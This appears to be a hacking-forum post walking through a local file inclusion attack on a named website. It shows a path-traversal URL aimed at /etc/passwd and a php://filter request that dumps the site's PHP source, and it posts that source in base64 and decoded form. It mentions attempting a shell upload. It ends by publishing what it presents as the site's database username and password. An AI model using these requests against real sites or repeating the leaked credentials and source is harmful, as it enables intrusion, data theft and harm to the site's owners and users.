-
Lfi Filter Bypass
PHP Code:
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: Failed opening '../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
------------------------------
URL THAT TRIGGERED ERROR
------------------------------
http://mistflard.nl/index.php?page=../../../../../../../../etc/passwd
========================================
Now We See what we can do here
1.)http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=index.php
=========================================
2.)base 64 encoded response
---------------------------------
PD9waHAgCnJlcXVpcmUgInByZXBlbmQucGhwIjsgCiRsb2dpbj0kX0dFVFsnbG9naW4nXTsKPz4KPCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbmFsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9EVEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4KPG1ldGEgIG5hbWUgPSAidmlld3BvcnQiIGNvbnRlbnQgPSAid2lkdGg9MTAyNCIgLz4KPGxpbmsgaHJlZj0ic3RpamwuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiAvPgo8IS0tW2lmIElFIDZdPiA8bGluayBocmVmPSJzdGlqbDEuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIj48IVtlbmRpZl0tLT4KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSIvZmF2aWNvbi5pY28iIC8+Cjx0aXRsZT5taXN0ZmxhcmQ8L3RpdGxlPgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJtZDUuanMiPjwvc2NyaXB0Pgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gcGFzc1Jlc3BvbnNlKCkgewp2YXIgdXNlcl9lbGVtZW50ID0gZG9jdW1lbnQubG9naW4udXNlcl90ZW1wLnZhbHVlOyAvLyBkb2N1bWVudC5oZm9ybS51c2VyLnZhbHVlIAogIC8vZG9jdW1lbnQuaGZvcm0ucGFzcy52YWx1ZQpwYXNzPXVzZXJfZWxlbWVudCtkb2N1bWVudC5sb2dpbi5wYXNzX3RlbXAudmFsdWU7CmRvY3VtZW50LmxvZ2luLnBhc3NfdGVtcC52YWx1ZSA9ICIiOwp3YWNodDE9TUQ1KHBhc3MpLnRvTG93ZXJDYXNlKCk7CnBhc3M9IiI7Cjw/cGhwICRwYXJhPW1pY3JvdGltZSgxKSoxMDAwOyA/PgpidWZmPXdhY2h0MSs8P3BocCBlY2hvICRwYXJhOyA/PjsgCndhY2h0Mj1NRDUoYnVmZikudG9Mb3dlckNhc2UoKTsKZG9jdW1lbnQuaGZvcm0udXNlci52YWx1ZT11c2VyX2VsZW1lbnQ7CmRvY3VtZW50Lmhmb3JtLnBhc3N3b3JkLnZhbHVlPXdhY2h0MjsKZG9jdW1lbnQuaGZvcm0uY29kZS52YWx1ZT08P3BocCBlY2hvICRwYXJhOyA/PjsKZG9jdW1lbnQuaGZvcm0uc3VibWl0KCk7Cn0KPC9zY3JpcHQ+CjwvaGVhZD4KPGJvZHk+CjxkaXYgaWQ9Ik1haW4iPgo8ZGl2IGlkPSJIb29mZCI+CjxkaXYgaWQ9ImxvZ2luIj4KPD9waHAKaWYgKCRfU0VTU0lPTlsndXNlciddPT1udWxsKQp7CmlmICgkbG9naW49PTEpIGVjaG8gIjxhIGhyZWY9J2luZGV4LnBocD9wYWdlPWhvbWUucGhwJmxvZ2luPTAnIHRpdGxlPSdnYSB0ZXJ1Zyc+PGltZyBzcmM9J2ltYWdlcy9rbm9weS5naWYnIGFsdD0ndWl0JyBzdHlsZT0nYm9yZGVyOjAnLz48L2E+IjsgZWxzZSBlY2hvICI8YSBocmVmPSdpbmRleC5waHA/cGFnZT1pbmxlaWRpbmdhZG1pbi5waHAmbG9naW49MScgPjxpbWcgc3JjPSdpbWFnZXMva25vcHguZ2lmJyBhbHQ9J2Fhbicgc3R5bGU9J2JvcmRlcjowJy8+PC9hPiI7CmlmICgkbG9naW4hPTEpCnsKaW5jbHVkZSAiY29udHJvbGUucGhwIjsKZWNobyAiPHRhYmxlPjx0cj4iOwplY2hvICI8dGQ+Z2VicnVpa2Vyc25hYW06PC90ZD48dGQ+d2FjaHR3b29yZDo8L3RkPjwvdHI+IjsKZWNobyAiPHRyPjxmb3JtIGFjdGlvbj0nbG9naW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndXNlcm5hbWUnIHZhbHVlPScnIHN0eWxlPSd3aWR0aDo4N3B4O2hlaWdodDoxMnB4O2ZvbnQtc2l6ZToxMXB4Jy8+PC90ZD4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J3Bhc3N3b3JkJyBuYW1lPSdwYXNzd29yZCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0nY29kZScgdmFsdWU9JHBhcmEgPjwvdGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J2xvZ2luJyBjbGFzcz0na25vcDEnLz48L3RkPiI7CmVjaG8gIjwvZm9ybT4gIjsKfSBlbHNlCnsKZWNobyAnPGZvcm0gbmFtZT0ibG9naW4iPic7CmVjaG8gJzx0YWJsZT48dHI+PHRkPmdlYnJ1aWtlcnNuYWFtOjwvdGQ+PHRkPndhY2h0d29vcmQ6PC90ZD48L3RyPic7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndXNlcl90ZW1wJyB2YWx1ZT0nJyBzdHlsZT0nd2lkdGg6ODdweDtoZWlnaHQ6MTJweDtmb250LXNpemU6MTFweCcgLz48L3RkPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ncGFzc3dvcmQnIG5hbWU9J3Bhc3NfdGVtcCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD4iOwplY2hvICc8dGQ+PGlucHV0IG9uQ2xpY2s9InBhc3NSZXNwb25zZSgpOyByZXR1cm4gZmFsc2U7IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdGJ0biIgdmFsdWU9IkxvZ2luIHZlaWxpZyIgIGNsYXNzPSJrbm9wMiI+PC90ZD4nOwplY2hvICc8L2Zvcm0+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSJsb2dpbnZlaWxpZy5waHAiIE1FVEhPRD0iUE9TVCIgbmFtZT0iaGZvcm0iPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3N3b3JkIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJjb2RlIj4nOwplY2hvICc8L2Zvcm0+JzsKfQp9IGVsc2UKewplY2hvICI8aW1nIHNyYz0naW1hZ2VzL2tub3B6LmdpZicgYWx0PScnIHN0eWxlPSdib3JkZXI6MCcvPjwvYT4iOwokdXNlcj0kX1NFU1NJT05bJ3VzZXInXTsKZWNobyAiPHRhYmxlPjx0cj48dGQgc3R5bGU9J3dpZHRoOjIyMHB4Jz4kdXNlciBpcyBpbmdlbG9nZC48L3RkPjwvdHI+IjsKZWNobyAiPHRyPjx0ZD48Zm9ybSBhY3Rpb249J2xvZ3VpdC5waHAnIG1ldGhvZD0ncG9zdCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3ViMmEnIHZhbHVlPSdsb2d1aXQnIGNsYXNzPSdrbm9wMScgdGl0bGU9J3VpdGxvZ2dlbicvPiI7CmVjaG8gIjwvZm9ybT48L3RkPiI7ICAgLy8oPGEgaHJlZj0ibG9ndWl0LnBocCI+TG9ndWl0PC9hPikKIAp9CmlmICgoJF9TRVNTSU9OWyd1c2VyJ109PW51bGwpICYmICgkbG9naW4hPTEpKQp7CmVjaG8gIjxmb3JtIGFjdGlvbj0naW5kZXgucGhwP3BhZ2U9cGhwL2ZvcnVtL21lbGRhYW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdzdWJtaXRCdXR0b24nIHZhbHVlPSdpbnNjaHJpanZlbicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPC90ZD48L2Zvcm0+IjsKZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC5waHA/cGFnZT1waHAvZm9ydW0vdmVyZ2V0ZW4ucGhwJyBtZXRob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdzdWIyJyB2YWx1ZT0nPycgY2xhc3M9J2tub3AwJyB0aXRsZT0nd2FjaHR3b29yZCB2ZXJnZXRlbj8nLz4iOwplY2hvICI8L3RkPjwvZm9ybT4iOwp9IGVsc2UgaWYgKCRsb2dpbiE9MSkKewplY2hvICI8Zm9ybSBhY3Rpb249J2luZGV4LnBocD9wYWdlPXBocC9mb3J1bS9zY2hyaWpmdWl0LnBocCcgbWV0aG9kPSdwb3N0Jz4iOyBlY2hvIjx0ZCBzdHlsZT0nd2lkdGg6MTI4cHgnPjwvdGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J3VpdHNjaHJpanZlbicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPGlucHV0IHR5cGU9J2hpZGRlbicgbmFtZT0ndXNlcm5hYW0nIHZhbHVlPVwiJHVzZXJcIj4iOwplY2hvICI8L3RkPjwvZm9ybT4iOwogaWYgKCR1c2VyPT0nYWRtaW4nKQogewogZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC5waHA/cGFnZT1waHAvZm9ydW0vaW5zdGVsbGluZ2VuLnBocCcgbWV0aG9kPSdwb3N0Jz4iOwogZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1YnN0ZWxpbicgdmFsdWU9J0luLicgY2xhc3M9J2tub3AwJyB0aXRsZT0nSW5zdGVsbGluZ2VuJy8+IjsKIGVjaG8gIjwvdGQ+PC9mb3JtPiI7CiB9CiAKfSBlY2hvICI8L3RyPjwvdGFibGU+PC9kaXY+IjsgLy8gZWluZGUgbG9naW4KJHZvcm0xPScnOyR2b3JtMj0nJzskdm9ybTM9Jyc7JHZvcm00PScnOyR2b3JtNT0nJzskdm9ybTY9Jyc7CmlmIChpc3NldCgkX0dFVFsncGFnZSddKSkKICAgICRwYWdlID0gJF9HRVRbJ3BhZ2UnXTsKZWxzZSAkcGFnZSA9ICJpbmxlaWRpbmcucGhwIjsgCmlmICgkcGFnZT09ImlubGVpZGluZy5waHAiKSAgIHskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJpbmxlaWRpbmdhZG1pbi5waHAiKXskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJob21lLnBocCIpICAgICAgICB7JHZvcm0yPSdibG9rJzt9IGVsc2UKaWYgKCRwYWdlPT0idG9lbGljaHRpbmcucGhwIikgeyR2b3JtMz0nYmxvayc7fSBlbHNlCmlmICgkcGFnZT09ImZvcnVtcmVnZWxzLnBocCIpIHskdm9ybTQ9J2Jsb2snO30gZWxzZQppZiAoKCRwYWdlPT0iY29udGFjdC5waHAiKSB8fCAoJHBhZ2U9PSJlZm9ybS5waHAiKSB8fCAoJHBhZ2U9PSJtYWlsLnBocCIpICkgeyR2b3JtNT0nYmxvayc7fSBlbHNlIHskdm9ybTI9J2Jsb2snOyB9Cj8+CjwvZGl2PiA8IS0tZWluZGUgSG9vZmQtLT4KPGRpdiBjbGFzcz0ibWVudSI+CiA8ZGl2IGNsYXNzPSJob3Zlcm1lbnUiPgogPHVsPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtMTsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWlubGVpZGluZy5waHAiIHRpdGxlPSJJbmxlaWRpbmciPjxzcGFuPklubGVpZGluZzwvc3Bhbj48L2E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTI7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCIgdGl0bGU9IkZvcnVtIj48c3Bhbj5Gb3J1bTwvc3Bhbj48L2E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTM7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT10b2VsaWNodGluZy5waHAiIHRpdGxlPSIiPjxzcGFuPlRvZWxpY2h0aW5nPC9zcGFuPjwvYT48L2xpPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtNDsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWZvcnVtcmVnZWxzLnBocCIgdGl0bGU9IiI+PHNwYW4+Rm9ydW0gcmVnZWxzPC9zcGFuPjwvYT48L2xpPgogPGxpIGlkPSI8P3BocCBlY2hvICR2b3JtNTsgPz4iPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWNvbnRhY3QucGhwIiB0aXRsZT0iIj48c3Bhbj5Db250YWN0PC9zcGFuPjwvYT48L2xpPgogPC91bD4KPC9kaXY+CjwvZGl2Pgo8ZGl2IGNsYXNzPSJiYWxrIj48IS0tIHZvb3IgSUUgNiAtLT48L2Rpdj4KPD9waHAKaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQogICAgJHBhZ2UgPSAkX0dFVFsncGFnZSddOwplbHNlICRwYWdlID0gImlubGVpZGluZy5waHAiOyAKPz4KPD9waHAKZWNobyI8ZGl2IGlkPSdDb250ZW50Jz4iOwppZiAoKCRwYWdlPT0iaW5sZWlkaW5nYWRtaW4ucGhwIikgJiYgKCRfU0VTU0lPTlsndXNlciddIT1udWxsKSkgJHBhZ2U9ImlubGVpZGluZy5waHAiOwppbmNsdWRlICRwYWdlOyAKZWNobyAiPC9kaXY+IjsgLyplaW5kZSBjb250ZW50ICovCj8+CjxkaXYgaWQ9IlZvZXQiPgo8P3BocApzZXRsb2NhbGUoTENfVElNRSwnbmxfTkwnLCdubCcsJ2R1Jyk7CmVjaG8gIjxkaXYgc3R5bGU9J21hcmdpbi1sZWZ0OjYwMHB4O21hcmdpbi10b3A6MTBweDsnPiIuJ1BhZ2luYSBnZW9wZW5kOiAnLCBzdHJmdGltZSgiJUg6JU06JVMgJUEgJWQgJUIgJVkiLCBta3RpbWUoKSksJzwvZGl2Pic7Cj8+CjwvZGl2Pgo8L2Rpdj4gPCEtLWVpbmRlIG1haW4tLT4KCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KdmFyIGdhSnNIb3N0ID0gKCgiaHR0cHM6IiA9PSBkb2N1bWVudC5sb2NhdGlvbi5wcm90b2NvbCkgPyAiaHR0cHM6Ly9zc2wuIiA6ICJodHRwOi8vd3d3LiIpOwpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIGdhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpzJyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdCUzRSIpKTsKPC9zY3JpcHQ+CjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KdHJ5ewp2YXIgcGFnZVRyYWNrZXIgPSBfZ2F0Ll9nZXRUcmFja2VyKCJVQS0xNzUwODA1Ny0xIik7CnBhZ2VUcmFja2VyLl90cmFja1BhZ2V2aWV3KCk7Cn0gY2F0Y2goZXJyKSB7fQo8L3NjcmlwdD4KCjwvYm9keT4KPC9odG1s
-------------------------------------
Decoded Response
------------------------------------
<?php
require "prepend.php";
$login=$_GET['login'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name = "viewport" content = "width=1024" />
<link href="stijl.css" rel="stylesheet" type="text/css" />
<!--[if IE 6]> <link href="stijl1.css" rel="stylesheet" type="text/css"><![endif]-->
<link rel="shortcut icon" href="/favicon.ico" />
<title>mistflard</title>
<script type="text/javascript" src="md5.js"></script>
<script language="javascript">
function passResponse() {
var user_element = document.login.user_temp.value; // document.hform.user.value
//document.hform.pass.value
pass=user_element+document.login.pass_temp.value;
document.login.pass_temp.value = "";
wacht1=MD5(pass).toLowerCase();
pass="";
<?php $para=microtime(1)*1000; ?>
buff=wacht1+<?php echo $para; ?>;
wacht2=MD5(buff).toLowerCase();
document.hform.user.value=user_element;
document.hform.password.value=wacht2;
document.hform.code.value=<?php echo $para; ?>;
document.hform.submit();
}
</script>
</head>
<body>
<div id="Main">
<div id="Hoofd">
<div id="login">
<?php
if ($_SESSION['user']==null)
{
if ($login==1) echo "<a href='index.php?page=home.php&login=0' title='ga terug'><img src='images/knopy.gif' alt='uit' style='border:0'/></a>"; else echo "<a href='index.php?page=inleidingadmin.php&login=1' ><img src='images/knopx.gif' alt='aan' style='border:0'/></a>";
if ($login!=1)
{
include "controle.php";
echo "<table><tr>";
echo "<td>gebruikersnaam:</td><td>wachtwoord:</td></tr>";
echo "<tr><form action='login.php' method='post'>";
echo "<td><input type='text' name='username' value='' style='width:87px;height:12px;font-size:11px'/></td>";
echo "<td><input type='password' name='password' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo "<td><input type='hidden' name='code' value=$para ></td>";
echo "<td><input type='submit' name='submitButton' value='login' class='knop1'/></td>";
echo "</form> ";
} else
{
echo '<form name="login">';
echo '<table><tr><td>gebruikersnaam:</td><td>wachtwoord:</td></tr>';
echo "<td><input type='text' name='user_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo "<td><input type='password' name='pass_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo '<td><input onClick="passResponse(); return false;" type="submit" name="submitbtn" value="Login veilig" class="knop2"></td>';
echo '</form>';
echo '<form action="loginveilig.php" METHOD="POST" name="hform">';
echo '<input type="hidden" name="user">';
echo '<input type="hidden" name="password">';
echo '<input type="hidden" name="code">';
echo '</form>';
}
} else
{
echo "<img src='images/knopz.gif' alt='' style='border:0'/></a>";
$user=$_SESSION['user'];
echo "<table><tr><td style='width:220px'>$user is ingelogd.</td></tr>";
echo "<tr><td><form action='loguit.php' method='post'><input type='submit' name='sub2a' value='loguit' class='knop1' title='uitloggen'/>";
echo "</form></td>"; //(<a href="loguit.php">Loguit</a>)
}
if (($_SESSION['user']==null) && ($login!=1))
{
echo "<form action='index.php?page=php/forum/meldaan.php' method='post'>";
echo "<td><input type='submit' name='submitButton' value='inschrijven' class='knop2'/>";
echo "</td></form>";
echo "<form action='index.php?page=php/forum/vergeten.php' method='post'>";
echo "<td><input type='submit' name='sub2' value='?' class='knop0' title='wachtwoord vergeten?'/>";
echo "</td></form>";
} else if ($login!=1)
{
echo "<form action='index.php?page=php/forum/schrijfuit.php' method='post'>"; echo"<td style='width:128px'></td>";
echo "<td><input type='submit' name='submitButton' value='uitschrijven' class='knop2'/>";
echo "<input type='hidden' name='usernaam' value=\"$user\">";
echo "</td></form>";
if ($user=='admin')
{
echo "<form action='index.php?page=php/forum/instellingen.php' method='post'>";
echo "<td><input type='submit' name='substelin' value='In.' class='knop0' title='Instellingen'/>";
echo "</td></form>";
}
} echo "</tr></table></div>"; // einde login
$vorm1='';$vorm2='';$vorm3='';$vorm4='';$vorm5='';$vorm6='';
if (isset($_GET['page']))
$page = $_GET['page'];
else $page = "inleiding.php";
if ($page=="inleiding.php") {$vorm1='blok';} else
if ($page=="inleidingadmin.php"){$vorm1='blok';} else
if ($page=="home.php") {$vorm2='blok';} else
if ($page=="toelichting.php") {$vorm3='blok';} else
if ($page=="forumregels.php") {$vorm4='blok';} else
if (($page=="contact.php") || ($page=="eform.php") || ($page=="mail.php") ) {$vorm5='blok';} else {$vorm2='blok'; }
?>
</div> <!--einde Hoofd-->
<div class="menu">
<div class="hovermenu">
<ul>
<li id="<?php echo $vorm1; ?>"><a href="index.php?page=inleiding.php" title="Inleiding"><span>Inleiding</span></a></li>
<li id="<?php echo $vorm2; ?>"><a href="index.php?page=home.php" title="Forum"><span>Forum</span></a></li>
<li id="<?php echo $vorm3; ?>"><a href="index.php?page=toelichting.php" title=""><span>Toelichting</span></a></li>
<li id="<?php echo $vorm4; ?>"><a href="index.php?page=forumregels.php" title=""><span>Forum regels</span></a></li>
<li id="<?php echo $vorm5; ?>"><a href="index.php?page=contact.php" title=""><span>Contact</span></a></li>
</ul>
</div>
</div>
<div class="balk"><!-- voor IE 6 --></div>
<?php
if (isset($_GET['page']))
$page = $_GET['page'];
else $page = "inleiding.php";
?>
<?php
echo"<div id='Content'>";
if (($page=="inleidingadmin.php") && ($_SESSION['user']!=null)) $page="inleiding.php";
include $page;
echo "</div>"; /*einde content */
?>
<div id="Voet">
<?php
setlocale(LC_TIME,'nl_NL','nl','du');
echo "<div style='margin-left:600px;margin-top:10px;'>".'Pagina geopend: ', strftime("%H:%M:%S %A %d %B %Y", mktime()),'</div>';
?>
</div>
</div> <!--einde main-->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-17508057-1");
pageTracker._trackPageview();
} catch(err) {}
</script>
</body>
</html
-------------------------------------------------------------------
4.)Now we move on to see if we can root the box or atleast get a shell uploaded now they have open base dir restriction in effect
so i highly doubt we can upload a shell via proc/self/environ but we can try hold. nah didnt thnk so lets try this
5.)i grab prepend.php and decode its contents as well using opionated geeks base 64 decoder online and get the following
-----------------------------------------------
prepend.php
-----------------------------------------------
<?php
session_start();
require_once "MyDB.class.php";
require_once "php/login/versio.inc.php";
function check_ip($ip)
{
$mydb= new MyDB();
$sql="SELECT * FROM blokkeer Where ip='$ip'";
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) == 0) return true; else
{
$vandaag=date("Y-m-d");
$line = $mydb->fetch($result);
$datum=$line[2];
$reden=$line[4];
setlocale(LC_TIME,'nl_NL','nl','du');
$refa1=strpos($datum,'-');
$refa2=strripos($datum,'-');
$jaarA=substr($datum,0,$refa1);
$dagA=substr($datum,($refa2+1),2);
$maandA=substr($datum,($refa1+1),2);
$dat=strftime("%A %d %B %Y", mktime(0, 0, 0, $maandA, $dagA, $jaarA));
if ($datum>$vandaag) {echo "De toegang tot deze functie is u ontzegd, IP-adres geblokkeerd tot ".$dat;
if (($reden!='') && ($reden!=null)) echo "<br>wegens: ".$reden;
echo '<br><br>Keer terug naar de begin pagina.';
echo '<table><tr></tr><tr>';
echo '<form action="index.php?page=home.php" method="post">';
echo '<td><input type="submit" value="OK" class="verstuur"></td>';
echo '</form></tr></table>';
return false;}
else return true;
}
}
function check_mail($user)
{
$mydb= new MyDB();
$sql="SELECT veri FROM WebUser Where username='$user'";
$result=$mydb->doQuery($sql);
$line = $mydb->fetch($result);
if ($line[0] == 1) return true; else return false;
}
function check_auth_user3($user,$authorization) // nieuwe functie met extra controles
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($_SESSION['session_id']); $sw=false; // sessieid voldoet niet
if (($sessionid==$_SESSION['session_id']) && ($len==50) ) $sw=true; else {echo "Geen toegang: Sessionid klopt niet.<br>".$_SESSION['session_id']."<br>".$sessionid."<br>". $_SESSION['error_message']."<br>"; return false;}
if (($sw) && ($ip==$ipref)) $sx=true; else {echo "Geen toegang: Inlog-IP-adres verschilt van huidig IP-adres.<br>"; return false;} // username voldoet niet
}
else {echo "Geen toegang: Log eerst in a.u.b.<br>"; return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {echo "U bent niet geautoriseerd om deze pagina te openen.<br>"; return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
function check_auth_user4($user,$authorization) // nieuwe functie met extra controles zelfde functie als 3 maar dan zonder tekstmelding
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($_SESSION['session_id']); $sw=false;
if (($sessionid==$_SESSION['session_id']) && ($len==50) ) $sw=true; else {return false;} // sessieid voldoet niet
if (($sw) && ($ip==$ipref)) $sx=true; else {return false;} // ip voldoet niet
}
else {return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
function check_auth_user5($user,$session,$authorization) //functie voor aparte controle om na verloop sessie toch nog geldige submit te kunnen doen.
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($session); $sw=false;
if ( ($sessionid==$session) && ($len==50) ) {$sw=true; echo "Check_auth_user5 succesvol uitgevoerd<br>";} else {return false;} // sessieid voldoet niet
if (($sw) && ($ip==$ipref)) $sx=true; else {return false;} // ip voldoet niet
}
else {return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
?
-----------------------------------------------
6.)fuck that wasnt eas but here guys these assholes are smart sort of
====================
login info
====================
<?php
define(HOST, "localhost");
define(USERNAME,"jthkrgfw_beheer");
define(PASSWORD,"w15129");
define(DATABASE,"jthkrgfw_mistflard");
?>